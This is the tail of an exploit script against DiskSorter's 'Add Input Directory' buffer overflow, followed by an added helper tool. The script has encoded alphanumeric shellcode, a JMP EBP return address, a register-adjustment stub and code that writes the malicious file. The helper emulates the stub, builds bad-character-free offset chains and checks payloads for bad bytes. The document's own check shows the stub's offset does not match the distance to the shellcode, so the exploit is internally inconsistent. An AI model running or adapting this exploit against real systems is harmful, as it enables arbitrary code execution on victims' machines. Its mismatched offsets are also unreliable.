buf += "\x6f\x6f\x77\x39\x6f\x4e\x35\x4d\x6b\x58\x70\x4d\x65"
buf += "\x4e\x42\x53\x66\x62\x48\x6d\x76\x4a\x35\x6d\x6d\x4d"
buf += "\x4d\x69\x6f\x79\x45\x57\x4c\x46\x66\x53\x4c\x56\x6a"
buf += "\x6f\x70\x49\x6b\x6d\x30\x33\x45\x33\x35\x4d\x6b\x50"
buf += "\x47\x37\x63\x74\x32\x52\x4f\x53\x5a\x43\x30\x53\x63"
buf += "\x49\x6f\x38\x55\x52\x43\x63\x51\x50\x6c\x65\x33\x54"
buf += "\x6e\x62\x45\x54\x38\x62\x45\x55\x50\x41\x41"

jmpebp = "\x1f\x54\x1c\x65" # Why JMP EBP? Buffer at ESP is split, bad!

llamaleftovers = (
    "\x55"  # push EBP
    "\x58"  # pop EAX -> EAX = EBP
    "\x05\x55\x55\x55\x55"  # add EAX, 0x55555555
    "\x05\x55\x55\x55\x55"  # add EAX, 0x55555555
    "\x05\x56\x56\x55\x55"  # add EAX, 0x55555656 -> the three immediates sum to 0x100000100, which wraps to EAX = EBP + 0x100 in 32 bits
    "\x40"  # inc EAX -> EBP + 0x101; the x86/alpha_mixed shellcode (BufferRegister=EAX) must start exactly here, since its decoder uses EAX as its own address
    )

junk = "\x55" + "\x53\x5b" * 105  # push EBP, then PUSH EBX / POP EBX pairs ("S[") as ASCII-clean filler (the original had a stray second "+", a syntax error)

data = "A"*4096 + jmpebp + "\x40\x48" * 20 + llamaleftovers + junk + buf

a.write(data)
a.close()
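Added example for the three challenges listed in the DiskSorter header; it is not abatchy17's code. It emulates the `add eax, imm32` / `inc eax` / `dec eax` stub to report the delta it really produces (x86 addition wraps at 2**32, which is why immediates as large as 0x55555555 can add up to a small offset), builds such a chain for any delta out of a constrained byte set, and checks payload bytes against the bad characters. The allowed set (printable ASCII minus the page's bad chars and the backslash) and the assumption that EBP points at the start of the `\x40\x48` sled when `jmp ebp` lands are mine, not the page's.

```python
import struct

# From the exploit header above: bytes the "Add Input Directory" box rejects
# (LF, CR, '/') plus '\' (0x5c), which splits the buffer sitting at ESP.
BADCHARS = frozenset(b"\x0a\x0d\x2f\x5c")
# Assumption, not stated on the page: any other printable ASCII byte
# (0x21..0x7e) survives the text box; the page itself only relies on 'U'/'V'.
ALLOWED = [b for b in range(0x21, 0x7F) if b not in BADCHARS]

OP_ADD_EAX_IMM32 = 0x05   # add eax, imm32
OP_INC_EAX = 0x40         # inc eax
OP_DEC_EAX = 0x48         # dec eax

# The page's own register-adjustment stub, minus the push ebp / pop eax prologue.
PAGE_CHAIN = b"\x05\x55\x55\x55\x55\x05\x55\x55\x55\x55\x05\x56\x56\x55\x55\x40"


def bad_bytes(payload):
    """Sorted list of bad-char values present in payload (empty means clean)."""
    return sorted(b for b in set(payload) if b in BADCHARS)


def chain_delta(chain):
    """Emulate add eax,imm32 / inc eax / dec eax on a 32-bit EAX that starts at 0
    and return the net delta modulo 2**32."""
    eax, i = 0, 0
    while i < len(chain):
        op = chain[i]
        if op == OP_ADD_EAX_IMM32:
            imm = struct.unpack_from("<I", chain, i + 1)[0]
            eax = (eax + imm) & 0xFFFFFFFF
            i += 5
        elif op == OP_INC_EAX:
            eax = (eax + 1) & 0xFFFFFFFF
            i += 1
        elif op == OP_DEC_EAX:
            eax = (eax - 1) & 0xFFFFFFFF
            i += 1
        else:
            raise ValueError("unsupported opcode 0x%02x at offset %d" % (op, i))
    return eax


def build_add_chain(delta, allowed=ALLOWED, terms=3):
    """Encode `delta` as `terms` consecutive add eax,imm32 instructions whose
    immediate bytes all come from `allowed`. Solved byte by byte from the least
    significant byte, carrying into the next byte and backtracking when a byte
    cannot be completed; the carry out of the top byte is discarded (wrap)."""
    target = (delta & 0xFFFFFFFF).to_bytes(4, "little")
    allowed_set = set(allowed)
    imms = [[0] * 4 for _ in range(terms)]

    def solve_byte(pos, carry):
        if pos == 4:
            return True
        return choose(pos, carry, 0, 0)

    def choose(pos, carry, term, acc):
        if term == terms - 1:
            # The last immediate's byte is forced by the target byte and the carry-in.
            need = (target[pos] - acc - carry) % 256
            if need not in allowed_set:
                return False
            imms[term][pos] = need
            return solve_byte(pos + 1, (acc + need + carry) // 256)
        for b in allowed:
            imms[term][pos] = b
            if choose(pos, carry, term + 1, acc + b):
                return True
        return False

    if not solve_byte(0, 0):
        raise ValueError("no %d-term encoding of 0x%08x within the allowed bytes" % (terms, delta & 0xFFFFFFFF))
    return b"".join(bytes([OP_ADD_EAX_IMM32]) + bytes(imm) for imm in imms)


def layout_offset_to_shellcode(sled, stub, junk):
    """Bytes from the start of the inc/dec sled (where JMP EBP lands if EBP
    points at it, an assumption) to the first byte of the alphanumeric shellcode."""
    return len(sled) + len(stub) + len(junk)


if __name__ == "__main__":
    print("page chain puts EAX at EBP + 0x%x" % chain_delta(PAGE_CHAIN))
    sled, stub = b"\x40\x48" * 20, b"\x55\x58" + PAGE_CHAIN
    junk = b"\x55" + b"\x53\x5b" * 105
    print("shellcode begins %d bytes after the sled" % layout_offset_to_shellcode(sled, stub, junk))
    chain = build_add_chain(209)
    print("3-term chain for +209:", chain.hex(), "bad bytes:", bad_bytes(chain))
```

Run against the page's own bytes, `chain_delta(PAGE_CHAIN)` returns 0x101 and `layout_offset_to_shellcode(...)` returns 269, so the stub's offset comment and the distance to `buf` should be reconciled in a debugger before the generated file is trusted; `build_add_chain` produces a replacement stub for whichever distance turns out to be right, with every immediate byte inside the allowed set.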